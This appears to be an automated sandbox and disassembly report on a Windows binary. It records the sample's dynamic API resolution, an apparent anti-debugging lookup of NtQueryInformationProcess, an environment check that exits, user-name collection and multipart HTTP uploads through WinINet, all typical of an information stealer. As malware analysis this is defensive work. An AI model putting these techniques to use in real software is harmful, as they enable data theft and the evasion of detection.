9 API calls

                                          Control-flow Graph

                                          APIs
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                          • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                          • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                          • strlen.MSVCRT ref: 004046F0
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                          Strings
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                          • API String ID: 2127927946-2218711628
                                          • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                          • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                          • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                          • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 665 419860-419874 call 419750 668 419a93-419af2 LoadLibraryA * 5 665->668 669 41987a-419a8e call 419780 GetProcAddress * 21 665->669 670 419af4-419b08 GetProcAddress 668->670 671 419b0d-419b14 668->671 669->668 670->671 674 419b46-419b4d 671->674 675 419b16-419b41 GetProcAddress * 2 671->675 676 419b68-419b6f 674->676 677 419b4f-419b63 GetProcAddress 674->677 675->674 678 419b71-419b84 GetProcAddress 676->678 679 419b89-419b90 676->679 677->676 678->679 680 419bc1-419bc2 679->680 681 419b92-419bbc GetProcAddress * 2 679->681 681->680
                                          APIs
                                          • GetProcAddress.KERNEL32(75900000,0094BB40), ref: 004198A1
                                          • GetProcAddress.KERNEL32(75900000,0094BB28), ref: 004198BA
                                          • GetProcAddress.KERNEL32(75900000,0094BA98), ref: 004198D2
                                          • GetProcAddress.KERNEL32(75900000,0094BAB0), ref: 004198EA
                                          • GetProcAddress.KERNEL32(75900000,0094BE10), ref: 00419903
                                          • GetProcAddress.KERNEL32(75900000,00946040), ref: 0041991B
                                          • GetProcAddress.KERNEL32(75900000,00944940), ref: 00419933
                                          • GetProcAddress.KERNEL32(75900000,00944980), ref: 0041994C
                                          • GetProcAddress.KERNEL32(75900000,0094BD68), ref: 00419964
                                          • GetProcAddress.KERNEL32(75900000,0094BCF0), ref: 0041997C
                                          • GetProcAddress.KERNEL32(75900000,0094BE88), ref: 00419995
                                          • GetProcAddress.KERNEL32(75900000,0094BE58), ref: 004199AD
                                          • GetProcAddress.KERNEL32(75900000,00944900), ref: 004199C5
                                          • GetProcAddress.KERNEL32(75900000,0094BD98), ref: 004199DE
                                          • GetProcAddress.KERNEL32(75900000,0094BD80), ref: 004199F6
                                          • GetProcAddress.KERNEL32(75900000,00944780), ref: 00419A0E
                                          • GetProcAddress.KERNEL32(75900000,0094BCD8), ref: 00419A27
                                          • GetProcAddress.KERNEL32(75900000,0094BDB0), ref: 00419A3F
                                          • GetProcAddress.KERNEL32(75900000,009449C0), ref: 00419A57
                                          • GetProcAddress.KERNEL32(75900000,0094BC48), ref: 00419A70
                                          • GetProcAddress.KERNEL32(75900000,009447E0), ref: 00419A88
                                          • LoadLibraryA.KERNEL32(0094BBA0,?,00416A00), ref: 00419A9A
                                          • LoadLibraryA.KERNEL32(0094BBD0,?,00416A00), ref: 00419AAB
                                          • LoadLibraryA.KERNEL32(0094BDC8,?,00416A00), ref: 00419ABD
                                          • LoadLibraryA.KERNEL32(0094BDE0,?,00416A00), ref: 00419ACF
                                          • LoadLibraryA.KERNEL32(0094BC60,?,00416A00), ref: 00419AE0
                                          • GetProcAddress.KERNEL32(75070000,0094BE40), ref: 00419B02
                                          • GetProcAddress.KERNEL32(75FD0000,0094BC90), ref: 00419B23
                                          • GetProcAddress.KERNEL32(75FD0000,0094BBE8), ref: 00419B3B
                                          • GetProcAddress.KERNEL32(75A50000,0094BD08), ref: 00419B5D
                                          • GetProcAddress.KERNEL32(74E50000,00944960), ref: 00419B7E
                                          • GetProcAddress.KERNEL32(76E80000,00946050), ref: 00419B9F
                                          • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419BB6
                                          Strings
                                          • NtQueryInformationProcess, xrefs: 00419BAA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: NtQueryInformationProcess
                                          • API String ID: 2238633743-2781105232
                                          • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                          • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                          • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                          • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                                          APIs
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                            • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                            • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                          • StrCmpCA.SHLWAPI(?,00978648), ref: 0040493A
                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                          • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,0097D0B0), ref: 00404DE8
                                          • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                          • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                          • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                          • HttpOpenRequestA.WININET(00000000,0097D020,?,0097C5F8,00000000,00000000,00400100,00000000), ref: 00404B15
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                          • String ID: "$"$------$------$------
                                          • API String ID: 2402878923-2180234286
                                          • Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                          • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                          • Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                          • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                          • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocNameProcessUser
                                          • String ID:
                                          • API String ID: 1206570057-0
                                          • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                          • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                          • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                          • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                          APIs
                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                          • ExitProcess.KERNEL32 ref: 0040117E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitInfoProcessSystem
                                          • String ID:
                                          • API String ID: 752954902-0
                                          • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                          • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                          • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
